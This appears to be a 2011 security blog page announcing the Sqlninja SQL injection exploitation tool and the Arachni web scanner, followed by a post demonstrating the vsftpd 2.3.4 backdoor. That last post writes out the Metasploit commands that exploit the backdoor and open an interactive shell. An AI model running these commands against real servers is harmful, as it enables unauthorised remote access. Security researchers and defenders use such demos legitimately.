Tuesday, 5. July 2011
Sqlninja v.0.2.6-rc1 Linux
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:
.Linux
.FreeBSD
.Mac OS X

It is basically an official release with all the new features that have been in the SVN for a while (most of them for almost 1 year, ouch). More specifically:

.ICMP-based shell
.CVE-2010-0232 support to escalate the sqlsrvr.exe process to SYSTEM (greetz Tavis)
.Header-based injection support

Download:
http://sqlninja.sourceforge.net/download.html

Permalink

 


Arachni v0.2.4 Security Scanner Linux
Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.
The main focus of this release has been on taking care of some pesky bugs and implementing a few feature requests.

Download: https://github.com/Zapotek/arachni

See Changelog: http://arachni.segfault.gr

Permalink

 


Video Demonstration : Vsftpd backdoor
Affected versions :
vsftpd-2.3.4 from 2011-06-30

https://security.appspot.com/vsftpd.html
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz.asc
http://pastebin.com/AetT9sS5

Metasploit demo :
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a

http://www.youtube.com/watch?v=WgXm0tgRMos&feature=player_embedded

discovered by Mathias Kresin

Permalink